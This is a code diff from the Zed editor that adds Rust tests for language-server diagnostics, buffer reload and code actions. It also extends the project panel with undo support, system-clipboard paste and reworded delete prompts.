@@ -3610,6 +3758,266 @@ async fn test_diagnostics_from_multiple_language_servers(cx: &mut gpui::TestAppC
});
}
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_worktree_entry_removal(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "one", "b.rs": "two" }))
+ .await;
+
+ let project = Project::test(fs.clone(), [Path::new(path!("/dir"))], cx).await;
+ let lsp_store = project.read_with(cx, |project, _| project.lsp_store());
+
+ lsp_store.update(cx, |lsp_store, cx| {
+ lsp_store
+ .update_diagnostic_entries(
+ LanguageServerId(0),
+ Path::new(path!("/dir/a.rs")).to_owned(),
+ None,
+ None,
+ vec![DiagnosticEntry {
+ range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)),
+ diagnostic: Diagnostic {
+ severity: DiagnosticSeverity::ERROR,
+ is_primary: true,
+ message: "error in a".to_string(),
+ source_kind: DiagnosticSourceKind::Pushed,
+ ..Diagnostic::default()
+ },
+ }],
+ cx,
+ )
+ .unwrap();
+ lsp_store
+ .update_diagnostic_entries(
+ LanguageServerId(0),
+ Path::new(path!("/dir/b.rs")).to_owned(),
+ None,
+ None,
+ vec![DiagnosticEntry {
+ range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)),
+ diagnostic: Diagnostic {
+ severity: DiagnosticSeverity::WARNING,
+ is_primary: true,
+ message: "warning in b".to_string(),
+ source_kind: DiagnosticSourceKind::Pushed,
+ ..Diagnostic::default()
+ },
+ }],
+ cx,
+ )
+ .unwrap();
+
+ assert_eq!(
+ lsp_store.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 1,
+ }
+ );
+ });
+
+ fs.remove_file(path!("/dir/a.rs").as_ref(), Default::default())
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ lsp_store.update(cx, |lsp_store, cx| {
+ assert_eq!(
+ lsp_store.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 0,
+ warning_count: 1,
+ },
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_server_restart(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "x" })).await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+ let mut fake_servers = language_registry.register_fake_lsp("Rust", FakeLspAdapter::default());
+
+ let (buffer, _handle) = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ fake_server.notify::<lsp::notification::PublishDiagnostics>(lsp::PublishDiagnosticsParams {
+ uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(),
+ version: None,
+ diagnostics: vec![lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 1)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "error before restart".to_string(),
+ ..Default::default()
+ }],
+ });
+ cx.executor().run_until_parked();
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 0,
+ }
+ );
+ });
+
+ let mut events = cx.events(&project);
+
+ project.update(cx, |project, cx| {
+ project.restart_language_servers_for_buffers(vec![buffer.clone()], HashSet::default(), cx);
+ });
+ cx.executor().run_until_parked();
+
+ let mut received_diagnostics_updated = false;
+ while let Some(Some(event)) =
+ futures::FutureExt::now_or_never(futures::StreamExt::next(&mut events))
+ {
+ if matches!(event, Event::DiagnosticsUpdated { .. }) {
+ received_diagnostics_updated = true;
+ }
+ }
+ assert!(
+ received_diagnostics_updated,
+ "DiagnosticsUpdated event should be emitted when a language server is stopped"
+ );
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 0,
+ warning_count: 0,
+ }
+ );
+ });
+}
+
+#[gpui::test]
+async fn test_diagnostic_summaries_cleared_on_buffer_reload(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(path!("/dir"), json!({ "a.rs": "one two three" }))
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(rust_lang());
+ let pull_count = Arc::new(atomic::AtomicUsize::new(0));
+ let closure_pull_count = pull_count.clone();
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options(
+ lsp::DiagnosticOptions {
+ identifier: Some("test-reload".to_string()),
+ inter_file_dependencies: true,
+ workspace_diagnostics: false,
+ work_done_progress_options: Default::default(),
+ },
+ )),
+ ..lsp::ServerCapabilities::default()
+ },
+ initializer: Some(Box::new(move |fake_server| {
+ let pull_count = closure_pull_count.clone();
+ fake_server.set_request_handler::<lsp::request::DocumentDiagnosticRequest, _, _>(
+ move |_, _| {
+ let pull_count = pull_count.clone();
+ async move {
+ pull_count.fetch_add(1, atomic::Ordering::SeqCst);
+ Ok(lsp::DocumentDiagnosticReportResult::Report(
+ lsp::DocumentDiagnosticReport::Full(
+ lsp::RelatedFullDocumentDiagnosticReport {
+ related_documents: None,
+ full_document_diagnostic_report:
+ lsp::FullDocumentDiagnosticReport {
+ result_id: None,
+ items: Vec::new(),
+ },
+ },
+ ),
+ ))
+ }
+ },
+ );
+ })),
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let (_buffer, _handle) = project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ cx.executor().run_until_parked();
+
+ // Publish initial diagnostics via the fake server.
+ fake_server.notify::<lsp::notification::PublishDiagnostics>(lsp::PublishDiagnosticsParams {
+ uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(),
+ version: None,
+ diagnostics: vec![lsp::Diagnostic {
+ range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 3)),
+ severity: Some(lsp::DiagnosticSeverity::ERROR),
+ message: "error in a".to_string(),
+ ..Default::default()
+ }],
+ });
+ cx.executor().run_until_parked();
+
+ project.update(cx, |project, cx| {
+ assert_eq!(
+ project.diagnostic_summary(false, cx),
+ DiagnosticSummary {
+ error_count: 1,
+ warning_count: 0,
+ }
+ );
+ });
+
+ let pulls_before = pull_count.load(atomic::Ordering::SeqCst);
+
+ // Change the file on disk. The FS event triggers buffer reload,
+ // which in turn triggers pull_diagnostics_for_buffer.
+ fs.save(
+ path!("/dir/a.rs").as_ref(),
+ &"fixed content".into(),
+ LineEnding::Unix,
+ )
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ let pulls_after = pull_count.load(atomic::Ordering::SeqCst);
+ assert!(
+ pulls_after > pulls_before,
+ "Expected document diagnostic pull after buffer reload (before={pulls_before}, after={pulls_after})"
+ );
+}
+
#[gpui::test]
async fn test_edits_from_lsp2_with_past_version(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -5552,7 +5960,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5581,9 +5989,9 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged,
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
],
);
events.lock().clear();
@@ -5598,7 +6006,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5638,7 +6046,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
mem::take(&mut *events.lock()),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5653,7 +6061,7 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
assert_eq!(
*events.lock(),
&[
- language::BufferEvent::Edited,
+ language::BufferEvent::Edited { is_local: true },
language::BufferEvent::DirtyChanged
]
);
@@ -5687,6 +6095,75 @@ async fn test_buffer_is_dirty(cx: &mut gpui::TestAppContext) {
cx.update(|cx| assert!(buffer3.read(cx).is_dirty()));
}
+#[gpui::test]
+async fn test_dirty_buffer_reloads_after_undo(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "file.txt": "version 1",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await;
+ let buffer = project
+ .update(cx, |p, cx| p.open_local_buffer(path!("/dir/file.txt"), cx))
+ .await
+ .unwrap();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert_eq!(buffer.text(), "version 1");
+ assert!(!buffer.is_dirty());
+ });
+
+ // User makes an edit, making the buffer dirty.
+ buffer.update(cx, |buffer, cx| {
+ buffer.edit([(0..0, "user edit: ")], None, cx);
+ });
+
+ buffer.read_with(cx, |buffer, _| {
+ assert!(buffer.is_dirty());
+ assert_eq!(buffer.text(), "user edit: version 1");
+ });
+
+ // External tool writes new content while buffer is dirty.
+ // file_updated() updates the File but suppresses ReloadNeeded.
+ fs.save(
+ path!("/dir/file.txt").as_ref(),
+ &"version 2 from external tool".into(),
+ Default::default(),
+ )
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert!(buffer.has_conflict());
+ assert_eq!(buffer.text(), "user edit: version 1");
+ });
+
+ // User undoes their edit. Buffer becomes clean, but disk has different
+ // content. did_edit() detects the dirty->clean transition and checks if
+ // disk changed while dirty. Since mtime differs from saved_mtime, it
+ // emits ReloadNeeded.
+ buffer.update(cx, |buffer, cx| {
+ buffer.undo(cx);
+ });
+ cx.executor().run_until_parked();
+
+ buffer.read_with(cx, |buffer, _| {
+ assert_eq!(
+ buffer.text(),
+ "version 2 from external tool",
+ "buffer should reload from disk after undo makes it clean"
+ );
+ assert!(!buffer.is_dirty());
+ });
+}
+
#[gpui::test]
async fn test_buffer_file_changes_on_disk(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -7595,6 +8072,92 @@ async fn test_code_actions_only_kinds(cx: &mut gpui::TestAppContext) {
);
}
+#[gpui::test]
+async fn test_code_actions_without_requested_kinds_do_not_send_only_filter(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/dir"),
+ json!({
+ "a.ts": "a",
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs, [path!("/dir").as_ref()], cx).await;
+
+ let language_registry = project.read_with(cx, |project, _| project.languages().clone());
+ language_registry.add(typescript_lang());
+ let mut fake_language_servers = language_registry.register_fake_lsp(
+ "TypeScript",
+ FakeLspAdapter {
+ capabilities: lsp::ServerCapabilities {
+ code_action_provider: Some(lsp::CodeActionProviderCapability::Options(
+ lsp::CodeActionOptions {
+ code_action_kinds: Some(vec![
+ CodeActionKind::SOURCE_ORGANIZE_IMPORTS,
+ "source.doc".into(),
+ ]),
+ ..lsp::CodeActionOptions::default()
+ },
+ )),
+ ..lsp::ServerCapabilities::default()
+ },
+ ..FakeLspAdapter::default()
+ },
+ );
+
+ let (buffer, _handle) = project
+ .update(cx, |p, cx| {
+ p.open_local_buffer_with_lsp(path!("/dir/a.ts"), cx)
+ })
+ .await
+ .unwrap();
+ cx.executor().run_until_parked();
+
+ let fake_server = fake_language_servers
+ .next()
+ .await
+ .expect("failed to get the language server");
+
+ let mut request_handled = fake_server.set_request_handler::<
+ lsp::request::CodeActionRequest,
+ _,
+ _,
+ >(move |params, _| async move {
+ assert_eq!(
+ params.context.only, None,
+ "Code action requests without explicit kind filters should not send `context.only`"
+ );
+ Ok(Some(vec![lsp::CodeActionOrCommand::CodeAction(
+ lsp::CodeAction {
+ title: "Add test".to_string(),
+ kind: Some("source.addTest".into()),
+ ..lsp::CodeAction::default()
+ },
+ )]))
+ });
+
+ let code_actions_task = project.update(cx, |project, cx| {
+ project.code_actions(&buffer, 0..buffer.read(cx).len(), None, cx)
+ });
+
+ let () = request_handled
+ .next()
+ .await
+ .expect("The code action request should have been triggered");
+
+ let code_actions = code_actions_task.await.unwrap().unwrap();
+ assert_eq!(code_actions.len(), 1);
+ assert_eq!(
+ code_actions[0].lsp_action.action_kind(),
+ Some("source.addTest".into())
+ );
+}
+
#[gpui::test]
async fn test_multiple_language_server_actions(cx: &mut gpui::TestAppContext) {
init_test(cx);
@@ -11320,6 +11883,77 @@ async fn test_undo_encoding_change(cx: &mut gpui::TestAppContext) {
});
}
+#[gpui::test]
+async fn test_initial_scan_complete(cx: &mut gpui::TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "a": {
+ ".git": {},
+ ".zed": {
+ "tasks.json": r#"[{"label": "task-a", "command": "echo a"}]"#
+ },
+ "src": { "main.rs": "" }
+ },
+ "b": {
+ ".git": {},
+ ".zed": {
+ "tasks.json": r#"[{"label": "task-b", "command": "echo b"}]"#
+ },
+ "src": { "lib.rs": "" }
+ },
+ }),
+ )
+ .await;
+
+ let repos_created = Rc::new(RefCell::new(Vec::new()));
+ let _observe = {
+ let repos_created = repos_created.clone();
+ cx.update(|cx| {
+ cx.observe_new::<Repository>(move |repo, _, cx| {
+ repos_created.borrow_mut().push(cx.entity().downgrade());
+ let _ = repo;
+ })
+ })
+ };
+
+ let project = Project::test(
+ fs.clone(),
+ [path!("/root/a").as_ref(), path!("/root/b").as_ref()],
+ cx,
+ )
+ .await;
+
+ let scan_complete = project.read_with(cx, |project, cx| project.wait_for_initial_scan(cx));
+ scan_complete.await;
+
+ project.read_with(cx, |project, cx| {
+ assert!(
+ project.worktree_store().read(cx).initial_scan_completed(),
+ "Expected initial scan to be completed after awaiting wait_for_initial_scan"
+ );
+ });
+
+ let created_repos_len = repos_created.borrow().len();
+ assert_eq!(
+ created_repos_len, 2,
+ "Expected 2 repositories to be created during scan, got {}",
+ created_repos_len
+ );
+
+ project.read_with(cx, |project, cx| {
+ let git_store = project.git_store().read(cx);
+ assert_eq!(
+ git_store.repositories().len(),
+ 2,
+ "Expected 2 repositories in GitStore"
+ );
+ });
+}
+
pub fn init_test(cx: &mut gpui::TestAppContext) {
zlog::init_test();
@@ -38,7 +38,7 @@ fn test_add() {
// add item when it equals to current item if it's not the last one
search_history.add(&mut cursor, "php".to_string());
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("rustlang"));
search_history.add(&mut cursor, "rustlang".to_string());
assert_eq!(search_history.len(), 3, "Should add item");
@@ -71,13 +71,13 @@ fn test_next_and_previous() {
assert_eq!(search_history.current(&cursor), Some("TypeScript"));
- assert_eq!(search_history.previous(&mut cursor), Some("JavaScript"));
+ assert_eq!(search_history.previous(&mut cursor, ""), Some("JavaScript"));
assert_eq!(search_history.current(&cursor), Some("JavaScript"));
- assert_eq!(search_history.previous(&mut cursor), Some("Rust"));
+ assert_eq!(search_history.previous(&mut cursor, ""), Some("Rust"));
assert_eq!(search_history.current(&cursor), Some("Rust"));
- assert_eq!(search_history.previous(&mut cursor), None);
+ assert_eq!(search_history.previous(&mut cursor, ""), None);
assert_eq!(search_history.current(&cursor), Some("Rust"));
assert_eq!(search_history.next(&mut cursor), Some("JavaScript"));
@@ -103,14 +103,14 @@ fn test_reset_selection() {
cursor.reset();
assert_eq!(search_history.current(&cursor), None);
assert_eq!(
- search_history.previous(&mut cursor),
+ search_history.previous(&mut cursor, ""),
Some("TypeScript"),
"Should start from the end after reset on previous item query"
);
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("JavaScript"));
- search_history.previous(&mut cursor);
+ search_history.previous(&mut cursor, "");
assert_eq!(search_history.current(&cursor), Some("Rust"));
cursor.reset();
@@ -134,8 +134,11 @@ fn test_multiple_cursors() {
assert_eq!(search_history.current(&cursor1), Some("TypeScript"));
assert_eq!(search_history.current(&cursor2), Some("C++"));
- assert_eq!(search_history.previous(&mut cursor1), Some("JavaScript"));
- assert_eq!(search_history.previous(&mut cursor2), Some("Java"));
+ assert_eq!(
+ search_history.previous(&mut cursor1, ""),
+ Some("JavaScript")
+ );
+ assert_eq!(search_history.previous(&mut cursor2, ""), Some("Java"));
assert_eq!(search_history.next(&mut cursor1), Some("TypeScript"));
assert_eq!(search_history.next(&mut cursor1), Some("Python"));
@@ -47,6 +47,7 @@ language.workspace = true
zed_actions.workspace = true
telemetry.workspace = true
notifications.workspace = true
+feature_flags.workspace = true
[dev-dependencies]
client = { workspace = true, features = ["test-support"] }
@@ -54,6 +55,7 @@ criterion.workspace = true
editor = { workspace = true, features = ["test-support"] }
gpui = { workspace = true, features = ["test-support"] }
language = { workspace = true, features = ["test-support"] }
+remote_connection = { workspace = true, features = ["test-support"] }
serde_json.workspace = true
tempfile.workspace = true
workspace = { workspace = true, features = ["test-support"] }
@@ -1,11 +1,12 @@
pub mod project_panel_settings;
+mod undo;
mod utils;
use anyhow::{Context as _, Result};
use client::{ErrorCode, ErrorExt};
use collections::{BTreeSet, HashMap, hash_map};
use command_palette_hooks::CommandPaletteFilter;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
Editor, EditorEvent, MultiBufferOffset,
items::{
@@ -13,20 +14,21 @@ use editor::{
entry_diagnostic_aware_icon_name_and_color, entry_git_aware_label_color,
},
};
+use feature_flags::{FeatureFlagAppExt, ProjectPanelUndoRedoFeatureFlag};
use file_icons::FileIcons;
use git;
use git::status::GitSummary;
use git_ui;
use git_ui::file_diff_view::FileDiffView;
use gpui::{
- Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardItem, Context, CursorStyle,
- DismissEvent, Div, DragMoveEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable,
- FontWeight, Hsla, InteractiveElement, KeyContext, ListHorizontalSizingBehavior,
- ListSizingBehavior, Modifiers, ModifiersChangedEvent, MouseButton, MouseDownEvent,
- ParentElement, PathPromptOptions, Pixels, Point, PromptLevel, Render, ScrollStrategy, Stateful,
- Styled, Subscription, Task, UniformListScrollHandle, WeakEntity, Window, actions, anchored,
- deferred, div, hsla, linear_color_stop, linear_gradient, point, px, size, transparent_white,
- uniform_list,
+ Action, AnyElement, App, AsyncWindowContext, Bounds, ClipboardEntry as GpuiClipboardEntry,
+ ClipboardItem, Context, CursorStyle, DismissEvent, Div, DragMoveEvent, Entity, EventEmitter,
+ ExternalPaths, FocusHandle, Focusable, FontWeight, Hsla, InteractiveElement, KeyContext,
+ ListHorizontalSizingBehavior, ListSizingBehavior, Modifiers, ModifiersChangedEvent,
+ MouseButton, MouseDownEvent, ParentElement, PathPromptOptions, Pixels, Point, PromptLevel,
+ Render, ScrollStrategy, Stateful, Styled, Subscription, Task, UniformListScrollHandle,
+ WeakEntity, Window, actions, anchored, deferred, div, hsla, linear_color_stop, linear_gradient,
+ point, px, size, transparent_white, uniform_list,
};
use language::DiagnosticSeverity;
use menu::{Confirm, SelectFirst, SelectLast, SelectNext, SelectPrevious};
@@ -81,6 +83,8 @@ use zed_actions::{
workspace::OpenWithSystem,
};
+use crate::undo::{ProjectPanelOperation, UndoManager};
+
const PROJECT_PANEL_KEY: &str = "ProjectPanel";
const NEW_ENTRY_ID: ProjectEntryId = ProjectEntryId::MAX;
@@ -157,6 +161,7 @@ pub struct ProjectPanel {
sticky_items_count: usize,
last_reported_update: Instant,
update_visible_entries_task: UpdateVisibleEntriesTask,
+ undo_manager: UndoManager,
state: State,
}
@@ -394,6 +399,8 @@ actions!(
SelectPrevDirectory,
/// Opens a diff view to compare two marked files.
CompareMarkedFiles,
+ /// Undoes the last file operation.
+ Undo,
]
);
@@ -893,6 +900,7 @@ impl ProjectPanel {
unfolded_dir_ids: Default::default(),
},
update_visible_entries_task: Default::default(),
+ undo_manager: UndoManager::new(workspace.weak_handle()),
};
this.update_visible_entries(None, false, false, window, cx);
@@ -999,16 +1007,18 @@ impl ProjectPanel {
.ok()
.flatten()
{
- Some(serialization_key) => cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
- .await
- .context("loading project panel")
- .log_err()
- .flatten()
- .map(|panel| serde_json::from_str::<SerializedProjectPanel>(&panel))
- .transpose()
- .log_err()
- .flatten(),
+ Some(serialization_key) => {
+ let kvp = cx.update(|_, cx| KeyValueStore::global(cx))?;
+ cx.background_spawn(async move { kvp.read_kvp(&serialization_key) })
+ .await
+ .context("loading project panel")
+ .log_err()
+ .flatten()
+ .map(|panel| serde_json::from_str::<SerializedProjectPanel>(&panel))
+ .transpose()
+ .log_err()
+ .flatten()
+ }
None => None,
};
@@ -1114,14 +1124,14 @@ impl ProjectPanel {
return;
};
let width = self.width;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedProjectPanel { width })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedProjectPanel { width })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1185,8 +1195,9 @@ impl ProjectPanel {
.is_some()
};
+ let has_pasteable_content = self.has_pasteable_content(cx);
let entity = cx.entity();
- let context_menu = ContextMenu::build(window, cx, |menu, _, _| {
+ let context_menu = ContextMenu::build(window, cx, |menu, _, cx| {
menu.context(self.focus_handle.clone()).map(|menu| {
if is_read_only {
menu.when(is_dir, |menu| {
@@ -1198,13 +1209,7 @@ impl ProjectPanel {
.separator()
.when(is_local, |menu| {
menu.action(
- if cfg!(target_os = "macos") && !is_remote {
- "Reveal in Finder"
- } else if cfg!(target_os = "windows") && !is_remote {
- "Reveal in File Explorer"
- } else {
- "Reveal in File Manager"
- },
+ ui::utils::reveal_in_file_manager_label(is_remote),
Box::new(RevealInFileManager),
)
})
@@ -1231,11 +1236,14 @@ impl ProjectPanel {
.action("Copy", Box::new(Copy))
.action("Duplicate", Box::new(Duplicate))
            // TODO: Paste should always be visible, but disabled when clipboard is empty
- .action_disabled_when(
- self.clipboard.as_ref().is_none(),
- "Paste",
- Box::new(Paste),
- )
+ .action_disabled_when(!has_pasteable_content, "Paste", Box::new(Paste))
+ .when(cx.has_flag::<ProjectPanelUndoRedoFeatureFlag>(), |menu| {
+ menu.action_disabled_when(
+ !self.undo_manager.can_undo(),
+ "Undo",
+ Box::new(Undo),
+ )
+ })
.when(is_remote, |menu| {
menu.separator()
.action("Download...", Box::new(DownloadFromRemote))
@@ -1881,6 +1889,8 @@ impl ProjectPanel {
let edit_task;
let edited_entry_id;
+ let edited_entry;
+ let new_project_path: ProjectPath;
if is_new_entry {
self.selection = Some(SelectedEntry {
worktree_id,
@@ -1891,12 +1901,14 @@ impl ProjectPanel {
return None;
}
+ edited_entry = None;
edited_entry_id = NEW_ENTRY_ID;
+ new_project_path = (worktree_id, new_path).into();
edit_task = self.project.update(cx, |project, cx| {
- project.create_entry((worktree_id, new_path), is_dir, cx)
+ project.create_entry(new_project_path.clone(), is_dir, cx)
});
} else {
- let new_path = if let Some(parent) = entry.path.clone().parent() {
+ let new_path = if let Some(parent) = entry.path.parent() {
parent.join(&filename)
} else {
filename.clone()
@@ -1908,9 +1920,11 @@ impl ProjectPanel {
return None;
}
edited_entry_id = entry.id;
+ edited_entry = Some(entry);
+ new_project_path = (worktree_id, new_path).into();
edit_task = self.project.update(cx, |project, cx| {
- project.rename_entry(entry.id, (worktree_id, new_path).into(), cx)
- });
+ project.rename_entry(edited_entry_id, new_project_path.clone(), cx)
+ })
};
if refocus {
@@ -1923,6 +1937,22 @@ impl ProjectPanel {
let new_entry = edit_task.await;
project_panel.update(cx, |project_panel, cx| {
project_panel.state.edit_state = None;
+
+ // Record the operation if the edit was applied
+ if new_entry.is_ok() {
+ let operation = if let Some(old_entry) = edited_entry {
+ ProjectPanelOperation::Rename {
+ old_path: (worktree_id, old_entry.path).into(),
+ new_path: new_project_path,
+ }
+ } else {
+ ProjectPanelOperation::Create {
+ project_path: new_project_path,
+ }
+ };
+ project_panel.undo_manager.record(operation);
+ }
+
cx.notify();
})?;
@@ -2173,6 +2203,11 @@ impl ProjectPanel {
}
}
+ pub fn undo(&mut self, _: &Undo, _window: &mut Window, cx: &mut Context<Self>) {
+ self.undo_manager.undo(cx);
+ cx.notify();
+ }
+
fn rename_impl(
&mut self,
selection: Option<Range<usize>>,
@@ -2360,6 +2395,7 @@ impl ProjectPanel {
let project_path = project.path_for_entry(selection.entry_id, cx)?;
dirty_buffers +=
project.dirty_buffers(cx).any(|path| path == project_path) as usize;
+
Some((
selection.entry_id,
project_path.path.file_name()?.to_string(),
@@ -2371,6 +2407,11 @@ impl ProjectPanel {
}
let answer = if !skip_prompt {
let operation = if trash { "Trash" } else { "Delete" };
+ let message_start = if trash {
+ "Do you want to trash"
+ } else {
+ "Are you sure you want to permanently delete"
+ };
let prompt = match file_paths.first() {
Some((_, path)) if file_paths.len() == 1 => {
let unsaved_warning = if dirty_buffers > 0 {
@@ -2379,7 +2420,7 @@ impl ProjectPanel {
""
};
- format!("{operation} {path}?{unsaved_warning}")
+ format!("{message_start} {path}?{unsaved_warning}")
}
_ => {
const CUTOFF_POINT: usize = 10;
@@ -2411,14 +2452,20 @@ impl ProjectPanel {
};
format!(
- "Do you want to {} the following {} files?\n{}{unsaved_warning}",
- operation.to_lowercase(),
+ "{message_start} the following {} files?\n{}{unsaved_warning}",
file_paths.len(),
names.join("\n")
)
}
};
- Some(window.prompt(PromptLevel::Info, &prompt, None, &[operation, "Cancel"], cx))
+ let detail = (!trash).then_some("This cannot be undone.");
+ Some(window.prompt(
+ PromptLevel::Info,
+ &prompt,
+ detail,
+ &[operation, "Cancel"],
+ cx,
+ ))
} else {
None
};
@@ -2987,6 +3034,7 @@ impl ProjectPanel {
fn cut(&mut self, _: &Cut, _: &mut Window, cx: &mut Context<Self>) {
let entries = self.disjoint_effective_entries(cx);
if !entries.is_empty() {
+ self.write_entries_to_system_clipboard(&entries, cx);
self.clipboard = Some(ClipboardEntry::Cut(entries));
cx.notify();
}
@@ -2995,6 +3043,7 @@ impl ProjectPanel {
fn copy(&mut self, _: &Copy, _: &mut Window, cx: &mut Context<Self>) {
let entries = self.disjoint_effective_entries(cx);
if !entries.is_empty() {
+ self.write_entries_to_system_clipboard(&entries, cx);
self.clipboard = Some(ClipboardEntry::Copied(entries));
cx.notify();
}
@@ -3011,16 +3060,25 @@ impl ProjectPanel {
if target_entry.is_file() || (target_entry.is_dir() && target_entry.id == source.entry_id) {
new_path.pop();
}
- let clipboard_entry_file_name = self
+
+ let source_worktree = self
.project
.read(cx)
- .path_for_entry(source.entry_id, cx)?
- .path
- .file_name()?
- .to_string();
+ .worktree_for_entry(source.entry_id, cx)?;
+ let source_entry = source_worktree.read(cx).entry_for_id(source.entry_id)?;
+
+ let clipboard_entry_file_name = source_entry.path.file_name()?.to_string();
new_path.push(RelPath::unix(&clipboard_entry_file_name).unwrap());
- let extension = new_path.extension().map(|s| s.to_string());
- let file_name_without_extension = new_path.file_stem()?.to_string();
+
+ let (extension, file_name_without_extension) = if source_entry.is_file() {
+ (
+ new_path.extension().map(|s| s.to_string()),
+ new_path.file_stem()?.to_string(),
+ )
+ } else {
+ (None, clipboard_entry_file_name.clone())
+ };
+
let file_name_len = file_name_without_extension.len();
let mut disambiguation_range = None;
let mut ix = 0;
@@ -3056,6 +3114,17 @@ impl ProjectPanel {
}
fn paste(&mut self, _: &Paste, window: &mut Window, cx: &mut Context<Self>) {
+ if let Some(external_paths) = self.external_paths_from_system_clipboard(cx) {
+ let target_entry_id = self
+ .selection
+ .map(|s| s.entry_id)
+ .or(self.state.last_worktree_root_id);
+ if let Some(entry_id) = target_entry_id {
+ self.drop_external_files(external_paths.paths(), entry_id, window, cx);
+ }
+ return;
+ }
+
maybe!({
let (worktree, entry) = self.selected_entry_handle(cx)?;
let entry = entry.clone();
@@ -3066,8 +3135,15 @@ impl ProjectPanel {
.filter(|clipboard| !clipboard.items().is_empty())?;
enum PasteTask {
- Rename(Task<Result<CreatedEntry>>),
- Copy(Task<Result<Option<Entry>>>),
+ Rename {
+ task: Task<Result<CreatedEntry>>,
+ old_path: ProjectPath,
+ new_path: ProjectPath,
+ },
+ Copy {
+ task: Task<Result<Option<Entry>>>,
+ destination: ProjectPath,
+ },
}
let mut paste_tasks = Vec::new();
@@ -3077,16 +3153,22 @@ impl ProjectPanel {
let (new_path, new_disambiguation_range) =
self.create_paste_path(clipboard_entry, self.selected_sub_entry(cx)?, cx)?;
